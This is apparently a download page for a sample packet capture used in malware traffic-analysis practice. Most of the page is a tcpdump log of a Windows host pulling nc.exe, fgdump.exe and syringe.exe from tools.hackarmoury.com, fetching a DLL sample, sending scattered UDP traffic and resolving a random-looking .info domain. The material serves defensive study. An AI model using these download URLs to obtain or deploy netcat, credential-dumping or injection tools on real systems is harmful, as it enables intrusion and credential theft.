Text Example

Tekdefense Hackarmoury.com Malware Rootkit NC Reverse Shell Traffic Analysis Sample PCAP file download

Download Attachments

2016-09-27 18:49:21.741750 IP 192.168.1.102.51427 > 75.75.75.75.53: 60216+ A? tools.hackarmoury.com. (39)
E..Cv…..k@…fKKKK…5./n..8………..tools.hackarmoury.com…..
2016-09-27 18:49:21.830486 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [S], seq 2438324637, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4j.@…&q…fUwR*.>.P.U…….. .z……………
2016-09-27 18:49:21.946139 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 1205265555, win 256, length 0
E..(j.@…&|…fUwR*.>.P.U..G…P….7……..
2016-09-27 18:49:21.949965 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [P.], seq 0:86, ack 1, win 256, length 86: HTTP: GET /all_binaries/nc.exe HTTP/1.1
E..~j.@…&%…fUwR*.>.P.U..G…P…….GET /all_binaries/nc.exe HTTP/1.1
User-Agent: AutoIt
Host: tools.hackarmoury.com
2016-09-27 18:49:22.107250 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 385, win 255, length 0
E..(j.@…&z…fUwR*.>.P.U..G…P….b……..
2016-09-27 18:49:33.280161 IP 192.168.1.102.51428 > 75.75.75.75.53: 53720+ A? www.download.windowsupdate.com. (48)
E..Lv…..k6…fKKKK…5.8.8………….www.download.windowsupdate.com…..

2016-09-27 18:49:59.821707 IP 192.168.1.102.60320 > 162.125.34.129.443: Flags [P.], seq 3757363309:3757364206, ack 3667706116, win 32446, length 897
E…
$@…f….f.}”……..m….P.~.V…….|1TI…….}g…….Q.X’..sq……A…”YYk….&..r…….Dr..[….X.y9e….:..CI(.f..q……u..p+.+Z.>.,.’eJ/.^(..F…..@|…)6r.<…z.)/U…..1….:………y
……….X{ .E%<….dvZ….M..1.0fCt..zBh….H<P.\.hL! L….Y…kr_.D.6..GG.&A[..Q.N….6#.&….o}.O…..[/5{..e.BJ&~2mx.4.:.S..v..:x..f%..].@uv.S….jEA…..{+v.;…….lk..u..y..J?.j..K .+ .)..i..nr._…..l..Q.u.m.^…..:.zb..Har{C#…w..-1…S2.X…)…..K…….&&……E.?O….f..;.5.,.^…*.g…D…..E.M….Z.j.ag….I.c…./….c..8…$.!3…R.v.. ..+…cD..h..^…..S….^…..v…..V..qpI.;c8.`~…S..(!.b.’….G$o..
…..}.e…Y:.W…&….f.e.Gn…….(`Yo=G.X0…zI.^.7.YI.4.j.]+… .j….G……….%……….Z..^6}.B.vi.).U./0.e..c’.!0…\..O….(……
P.w..Oc2…I.4.u.U…{v….CDY..q.ZiC Am8..q.ow..8….zK…m……x.5]@YVC.b.fP….3.n.0….yU.a.(….g.=.L.]%.^.;.Yx.Jz.RI…..9.}.oh….”T..%c&.JRs….O;..z….w
2016-09-27 18:50:04.394319 IP 192.168.1.102.51429 > 139.194.99.180.16250: UDP, length 198
E….=….oI…f..c…?z…@…..^(B.a….b_..T#…….AS…..R…….]6…..x._.P.Q…..bpU.k…i.=…..x.pH9V…….r..C9d……..bV.4.mV’..VM.Fj2.m…….nW ..|g..B…$].U……….ya..@?………L
……0d…..H…c|iZ.o..
2016-09-27 18:50:10.549050 IP 192.168.1.102.51429 > 69.36.201.244.22972: UDP, length 252
E…OI…..e…fE$….Y….Pxz..!.SN+……/v…5..`^~^..n.,?\./.omkzO….K…. G..w….r…….@.`..6….,…E….sE.A..ZB~..k.oi…………..M.+6…V.V..pb.p.W$C..%sV.P..
……t…Q.d.U=O……>..z……zF……7v….Cjw.&B…..R…….D…..w..8..l.r….j.!………..R-“.C”.
2016-09-27 18:50:13.934564 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [P.], seq 86:176, ack 385, win 255, length 90: HTTP: GET /all_binaries/fgdump.exe HTTP/1.1
E…j.@…&….fUwR*.>.P.U..G…P…….GET /all_binaries/fgdump.exe HTTP/1.1
User-Agent: AutoIt
Host: tools.hackarmoury.com
2016-09-27 18:50:14.079527 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 769, win 253, length 0
E..(j.@…&x…fUwR*.>.P.U.NG…P………….
2016-09-27 18:50:15.674294 IP 192.168.1.102.51429 > 171.7.96.61.19001: UDP, length 92
E..x:…..3a…f..`=..J9.dyx…………..L..@.*..x….,>…..?…….0[.34…”<.2..+.G.@….&….5:…../.WC”.s
6t..5.~
2016-09-27 18:50:23.049600 IP 192.168.1.102.51429 > 94.70.120.226.22474: UDP, length 111
E…u<….,….f^Fx…W..wKA}……..’…*..wd…d.b\|\..l}.=^.-.moixM…
p01. …D……8j…………%.$C$..4..GAv…9.K..2+^….G.\7?.]o
2016-09-27 18:50:28.633370 IP 192.168.1.102.51429 > 182.172.170.203.11751: UDP, length 109
E…E……….f……-..uEc….F……..CcB….8:/>. …0!ra..q^135$…J..r…
y\}{.4Y6y.a.#……734..W…….\6.+.!.y.3.igGD..G.a6a…
2016-09-27 18:50:33.383730 IP 192.168.1.102.63295 > 8.253.45.249.80: Flags [F.], seq 240, ack 434, win 254, length 0
E..(dV@….u…f..-..?.Pn….v..P…_………
2016-09-27 18:50:33.406668 IP 192.168.1.102.63295 > 8.253.45.249.80: Flags [.], ack 435, win 254, length 0
E..(dW@….t…f..-..?.Pn….v..P…_………
2016-09-27 18:50:34.039372 IP 192.168.1.102.51429 > 194.94.127.98.25549: UDP, length 189
E…T’………f.^.b..c….,.| ….2~.ac|f…L@I…NpPp..@Q..r…ACETa..;%’…..s..G$..b\…’5.9…q~.i$d…..T……..%j..<..w.W’>N……………Z].”…;z….x…]……^q)q…y.d0..o.V.{“..p…a…../.WP1g.g..H\..0
2016-09-27 18:50:39.586352 IP 192.168.1.102.51429 > 206.255.79.99.12982: UDP, length 137
E…………..f..Oc..2……J. ….80…..5..f.x……bp…..q…….~..J..\a…7..”…..|.F…X!..g..%x…D.w….:…..o…..H1…],…./.”D..Z. vx..tl…_……..
2016-09-27 18:50:40.055715 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [P.], seq 176:267, ack 769, win 253, length 91: HTTP: GET /all_binaries/syringe.exe HTTP/1.1
E…j.@…&….fUwR*.>.P.U.NG…P…!…GET /all_binaries/syringe.exe HTTP/1.1
User-Agent: AutoIt
Host: tools.hackarmoury.com

2016-09-27 18:50:40.270494 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 1140068285, win 65076, length 0
E..(q.@….E…f.1…@.P.+ExC…P..4……….
2016-09-27 18:50:40.271013 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [P.], seq 0:316, ack 1, win 65076, length 316: HTTP: GET /storage/samples/tekdefense.dll HTTP/1.1
E..dq.@……..f.1…@.P.+ExC…P..4.E..GET /storage/samples/tekdefense.dll HTTP/1.1
User-Agent: AutoIt
Host: www.tekdefense.com
Cookie: __utma=110816000.2021282349.1474935870.1474935870.1474935870.1; __utmz=110816000.1474935870.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ss_cid=c9d38daf-e0c6-4b79-a875-bec612f4f1db; ss_cpvisit=1474935871624

2016-09-27 18:50:40.572579 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 1, win 65076, options [nop,nop,sack 1 {1277:2553}], length 0
E..4q.@….7…f.1…@.P.+F.C……4…….
C…C…
2016-09-27 18:50:40.572774 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 1, win 65076, options [nop,nop,sack 1 {1277:3829}], length 0
E..4q.@….6…f.1…@.P.+F.C……4. …..
C…C…
2016-09-27 18:50:40.573418 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 1, win 65076, options [nop,nop,sack 1 {1277:4382}], length 0
E..4q.@….5…f.1…@.P.+F.C……4…….
C…C. .
2016-09-27 18:50:40.574698 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 4382, win 65076, length 0
E..(q.@….@…f.1…@.P.+F.C. .P..4um……..
2016-09-27 18:50:40.577305 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [F.], seq 316, ack 4382, win 65076, length 0
E..(q.@….?…f.1…@.P.+F.C. .P..4ul……..
2016-09-27 18:50:40.637550 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [R.], seq 317, ack 5105, win 0, length 0
E..(q.@….>…f.1…@.P.+F.C.#.P…p………
2016-09-27 18:50:45.398829 IP 192.168.1.102.51429 > 75.47.231.183.20840: UDP, length 131
E…F……….fK/….Qh….Z|GE%……._O:….a52.QoOo.._N..m..1^\ZK~.. ..y…`,.\……Jz..f..W.”……58RF….f_X..+.T&D..!.^..G……Sx………..c……..
2016-09-27 18:50:52.671575 IP 192.168.1.102.51429 > 108.217.170.200.25116: UDP, length 251
E…~……;…fl…..b…c…64~?N….(GL.Q…..-.0…..>/|o…P?=;*…E…!,0.A}#E…….E.Kc/6C………/.;.4……:…m.d.Mn:……Uz……..,.bJ.).j<F..>……..E…..}.l_.h.,p’….(……O..h……/E…..e..k..}…2……F.!…..F…Z.>……x}#.a+M`p……6..!…….Y.m0.
2016-09-27 18:51:00.156075 IP 192.168.1.102.51429 > 1.186.47.244.16276: UDP, length 214
E…Q……8…f../…?….y.V…..53\..
.V-…….!.?…/>m~..nA.,*;…P.67M.?..i.2..H.^E……..!..+.$[V.e…..e.RtZ,@…Ki.h.6.\..d..!..N.%..B…..-….>….T*….m..ci.Y….0.      ..l.a$6…#..A…O…[…. $/>.}5K..&…}….!..,…..q.)g..4%
2016-09-27 18:51:03.197133 IP 192.168.1.102.60320 > 162.125.34.129.443: Flags [P.], seq 897:1794, ack 258, win 32768, length 897
E…
%@…f….f.}”………….P………..|1TI……<h… .qW…?U.M.6..nG..3ycB.k)|…-….V.}….*.”R..~.#.2e..fJ6.C
…I.bR…hw?..’..r.f.*|..\i(……     f….w…Ng…P..7…….eo.o..n/..Z..#.*.;..H7.z6..d..Y…w…E0!;.K…..V)..U..q.+/…`..50……z…. @\x.in.X.w.    .]}.m…-.q.$F…@.|.z.w…0]…pE6…S..t].B…..,..L….t….8…….e………&..x..?.#Bo…..h.P1.-*BC……..s..?[……_T1D…kBl-z.G…..S.b6y7…DEu……..7.J`.F.0.D….W..2M.pj…._……)….I/…..Y…,zFV..N.N..#…..(a…./…..8…r>C.V….._.;.p.u.&:l..S…..x…C….TF…….*0.G..y.n5…V..V.G.n.[.C..r!…O.@..-.E…”…….s.,…..w..0.h-..p.#.c`.z*…..j.@;{.$…….&,…b….j…)..TK…IPjf\..#E.`e%`.D..D  t.x.]D=]d*Y..D2…..t.H..y.f…N#c..G.H.\s..4z5…
.@……8.5..i…j….`=.+m…H.m..q…..7.
……&a..%I..?.v..YM”..M. h…F….x.X..*lW..^Xo.r^Z.Tq…#.).{…. R$..UU.8.x.?..g….n…:g..)….V.&….IA@..:n*……..S`m.~W,.C._l.

2016-09-27 18:51:46.996932 IP 192.168.1.102.63301 > 173.194.175.147.80: Flags [P.], seq 0:173, ack 1, win 258, length 173: HTTP: GET / HTTP/1.1
E…dQ@…vm…f…..E.P..W.B…P…i…GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.google.com
Connection: Close
2016-09-27 18:51:49.253001 IP 192.168.1.102.64677 > 75.75.75.75.53: 64620+ A? ibcerwhewknzzhxwkffeuckrow.info. (49)
E..Mv…..k….fKKKK…5.9=
.l………..ibcerwhewknzzhxwkffeuckrow.info…..
2016-09-27 18:51:49.318989 IP 192.168.1.102.63306 > 54.83.43.69.80: Flags [S], seq 1904156170, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4L.@….F…f6S+E.J.Pq..
…… ..E…………..
2016-09-27 18:51:49.340014 IP 192.168.1.102.63306 > 54.83.43.69.80: Flags [.], ack 4227199289, win 256, length 0
E..(L.@….Q…f6S+E.J.Pq……9P………….
2016-09-27 18:51:49.340479 IP 192.168.1.102.63306 > 54.83.43.69.80: Flags [P.], seq 0:190, ack 1, win 256, length 190: HTTP: GET / HTTP/1.1
E…L.@……..f6S+E.J.Pq……9P…….GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ibcerwhewknzzhxwkffeuckrow.info
Connection: Close

Leave a Reply